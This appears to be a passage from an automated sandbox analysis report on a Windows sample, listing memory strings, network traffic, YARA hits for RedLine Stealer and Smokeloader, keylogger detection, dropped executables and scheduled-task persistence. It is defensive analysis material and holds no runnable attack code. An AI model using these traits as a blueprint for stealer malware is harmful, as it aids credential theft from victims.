0000001E.00000003.2958769374.00000270CC674000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3087332031.00000270DDB27000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA18F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6DE7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3069164464.00000270DB11C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3087332031.00000270DDB31000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3105314081.00000270E4003000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2958487375.00000270CC674000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3032836106.00000270D614F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3263744904.00000277E8E30000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/account
Source: firefox.exe, 0000001D.00000002.2958630660.0000014A6E160000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/account--attempting-deelevation
Source: bdb44f72d9.exe, 0000001B.00000002.3336626547.0000000006678000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/account3
Source: firefox.exe, 0000001C.00000002.2952270255.00000158A7AC0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3030803173.00000270C9930000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountC:
Source: firefox.exe, 0000001E.00000002.3030702011.00000270C98E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountH
Source: firefox.exe, 0000001E.00000002.3066978967.00000270DAF1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountMIN_STATUS_ANIMATION_DURATION_createNoSyncedTabsElement
Source: firefox.exe, 0000001E.00000002.3034852957.00000270D6947000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3034852957.00000270D6800000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3031858393.00000270CC685000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3263744904.00000277E8E30000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:
Source: bdb44f72d9.exe, 0000001B.00000002.3336626547.0000000006678000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountV
Source: firefox.exe, 0000001E.00000002.3066978967.00000270DAF1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/account_adoptBrowserFromOtherWindow
Source: firefox.exe, 0000001E.00000002.3036698382.00000270D6D7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/account_shouldViewDownloadInternallygetCombined/overrideFnArray
Source: bdb44f72d9.exe, 0000001B.00000002.3286301463.000000000211A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accounte
Source: bdb44f72d9.exe, 0000001B.00000002.3336626547.0000000006678000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accounti
Source: firefox.exe, 0000001E.00000002.3115240088.000039E679900000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3030250199.000001124EA00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.comZ
Source: firefox.exe, 0000001E.00000003.2999210432.00000270E4120000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3078302717.00000270DC7A4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3114150940.00001A176F100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3113615943.00000EEEADD04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.3008852300.00000270E4120000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6DE7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.zhihu.com/
Source: firefox.exe, 0000001E.00000002.3045499741.00000270D81B0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://xhr.spec.whatwg.org/#sync-warningThe
Source: firefox.exe, 0000001E.00000002.3071808582.00000270DB751000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.3019285727.00000270DC81C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3030250199.000001124EA00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3047918500.00000270D8B83000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3081525186.00000270DC99B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com
Source: firefox.exe, 0000001E.00000002.3081525186.00000270DC9C6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49850 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49853
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49851
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49850
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49853 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49851 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49802
Source: unknown Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49800
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:49801 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:49803 version: TLS 1.2
Installs a raw input device (often for capturing keystrokes)
Source: bdb44f72d9.exe, 00000017.00000002.3285543354.0000000002243000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: GetRawInputDataU?DJ memstr_ac73c3c2-6
Yara detected Keylogger Generic
Source: Yara match File source: Process Memory Space: bdb44f72d9.exe PID: 8148, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: bdb44f72d9.exe PID: 3852, type: MEMORYSTR

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 00000014.00000002.2765064487.000000000251D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000018.00000002.2900160849.00000000040C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000018.00000002.2899758965.00000000025D2000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.2382041122.000000000248D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.2382402163.00000000040B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000014.00000002.2765545970.00000000040B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000022.00000002.3056076605.00000000025B0000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000022.00000002.3056668030.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Binary is likely a compiled AutoIt script file
Source: bdb44f72d9.exe, 00000017.00000002.3241866502.0000000000372000.00000040.00000001.01000000.00000011.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_b3a6889b-0
Source: bdb44f72d9.exe, 00000017.00000002.3241866502.0000000000372000.00000040.00000001.01000000.00000011.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_5699a61b-7
Source: bdb44f72d9.exe, 0000001B.00000002.3241111543.0000000000372000.00000040.00000001.01000000.00000011.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_9e8ceaa3-b
Source: bdb44f72d9.exe, 0000001B.00000002.3241111543.0000000000372000.00000040.00000001.01000000.00000011.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_f0b13f88-9
PE file contains section with special chars
Source: RoamingCFCGIIEHIE.exe.0.dr Static PE information: section name:
Source: RoamingCFCGIIEHIE.exe.0.dr Static PE information: section name: .idata
Source: RoamingCFCGIIEHIE.exe.0.dr Static PE information: section name:
Source: userAKKKFBGDHJ.exe.0.dr Static PE information: section name:
Source: userAKKKFBGDHJ.exe.0.dr Static PE information: section name: .idata
Source: userAKKKFBGDHJ.exe.0.dr Static PE information: section name:
Source: explorti.exe.5.dr Static PE information: section name:
Source: explorti.exe.5.dr Static PE information: section name: .idata
Source: explorti.exe.5.dr Static PE information: section name:
Source: axplong.exe.8.dr Static PE information: section name:
Source: axplong.exe.8.dr Static PE information: section name: .idata
Source: axplong.exe.8.dr Static PE information: section name:
Contains functionality to call native functions
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C60B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6C60B700
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C60B8C0 rand_s,NtQueryVirtualMemory, 0_2_6C60B8C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C60B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError, 0_2_6C60B910
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5AF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6C5AF280
Creates files inside the system directory
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe File created: C:\Windows\Tasks\explorti.job Jump to behavior
Source: C:\Users\userAKKKFBGDHJ.exe File created: C:\Windows\Tasks\axplong.job Jump to behavior
Detected potential crypto function
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5A35A0 0_2_6C5A35A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5B5440 0_2_6C5B5440
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C61545C 0_2_6C61545C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C61542B 0_2_6C61542B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5E5C10 0_2_6C5E5C10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5F2C10 0_2_6C5F2C10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C61AC00 0_2_6C61AC00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5CD4D0 0_2_6C5CD4D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5B64C0 0_2_6C5B64C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5E6CF0 0_2_6C5E6CF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5AD4E0 0_2_6C5AD4E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6034A0 0_2_6C6034A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C60C4A0 0_2_6C60C4A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5B6C80 0_2_6C5B6C80
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5CED10 0_2_6C5CED10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5D0512 0_2_6C5D0512
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5BFD00 0_2_6C5BFD00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5E0DD0 0_2_6C5E0DD0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6085F0 0_2_6C6085F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C616E63 0_2_6C616E63
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5C9E50 0_2_6C5C9E50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5E3E50 0_2_6C5E3E50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5F2E4E 0_2_6C5F2E4E
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5C4640 0_2_6C5C4640
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5AC670 0_2_6C5AC670
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5E7E10 0_2_6C5E7E10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C609E30 0_2_6C609E30
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5F5600 0_2_6C5F5600
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6176E3 0_2_6C6176E3
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5ABEF0 0_2_6C5ABEF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5BFEF0 0_2_6C5BFEF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C604EA0 0_2_6C604EA0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5C5E90 0_2_6C5C5E90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C60E680 0_2_6C60E680
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5E7710 0_2_6C5E7710
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5B9F00 0_2_6C5B9F00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5D6FF0 0_2_6C5D6FF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5ADFE0 0_2_6C5ADFE0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5F77A0 0_2_6C5F77A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5C8850 0_2_6C5C8850
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5CD850 0_2_6C5CD850
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5EF070 0_2_6C5EF070
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5B7810 0_2_6C5B7810
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5EB820 0_2_6C5EB820
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5F4820 0_2_6C5F4820
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6150C7 0_2_6C6150C7
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5CC0E0 0_2_6C5CC0E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5E58E0 0_2_6C5E58E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5D60A0 0_2_6C5D60A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C61B170 0_2_6C61B170
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5CA940 0_2_6C5CA940
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5FB970 0_2_6C5FB970
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5BD960 0_2_6C5BD960
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5E5190 0_2_6C5E5190
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5DD9B0 0_2_6C5DD9B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C602990 0_2_6C602990
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5AC9A0 0_2_6C5AC9A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5E9A60 0_2_6C5E9A60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5E8AC0 0_2_6C5E8AC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5C1AF0 0_2_6C5C1AF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5EE2F0 0_2_6C5EE2F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C612AB0 0_2_6C612AB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5BCAB0 0_2_6C5BCAB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C61BA90 0_2_6C61BA90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5A22A0 0_2_6C5A22A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5D4AA0 0_2_6C5D4AA0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5A5340 0_2_6C5A5340
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5BC370 0_2_6C5BC370
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5ED320 0_2_6C5ED320
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6153C8 0_2_6C6153C8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5AF380 0_2_6C5AF380
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C65AC60 0_2_6C65AC60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C72AC30 0_2_6C72AC30
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\file.exe Code function: String function: 00404610 appears 316 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6C5DCBE8 appears 134 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6C5E94D0 appears 90 times
One or more processes crash
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2764 -s 2376
Sample file is different than original file name gathered from version info
Source: file.exe, 00000000.00000000.1997247217.000000000244C000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamesOdilesigo@ vs file.exe
Source: file.exe, 00000000.00000002.2401890239.000000006C632000.00000002.00000001.01000000.00000008.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs file.exe
Source: file.exe, 00000000.00000002.2402174118.000000006C825000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: OriginalFilenamenss3.dll0 vs file.exe
Uses 32bit PE files
Source: file.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 00000014.00000002.2765064487.000000000251D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000018.00000002.2900160849.00000000040C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000018.00000002.2899758965.00000000025D2000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.2382041122.000000000248D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.2382402163.00000000040B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000014.00000002.2765545970.00000000040B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000022.00000002.3056076605.00000000025B0000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000022.00000002.3056668030.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: random[1].exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: RoamingCFCGIIEHIE.exe.0.dr Static PE information: Section: ZLIB complexity 1.0000533640710383
Source: RoamingCFCGIIEHIE.exe.0.dr Static PE information: Section: cwtgiuyn ZLIB complexity 0.9942648984781278
Source: userAKKKFBGDHJ.exe.0.dr Static PE information: Section: ZLIB complexity 0.9967749489100818
Source: userAKKKFBGDHJ.exe.0.dr Static PE information: Section: pcxsfzhs ZLIB complexity 0.9944540457842248
Source: explorti.exe.5.dr Static PE information: Section: ZLIB complexity 1.0000533640710383
Source: explorti.exe.5.dr Static PE information: Section: cwtgiuyn ZLIB complexity 0.9942648984781278
Source: axplong.exe.8.dr Static PE information: Section: ZLIB complexity 0.9967749489100818
Source: axplong.exe.8.dr Static PE information: Section: pcxsfzhs ZLIB complexity 0.9944540457842248
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@48/55@23/10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C607030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree, 0_2_6C607030
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004190A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 0_2_004190A0
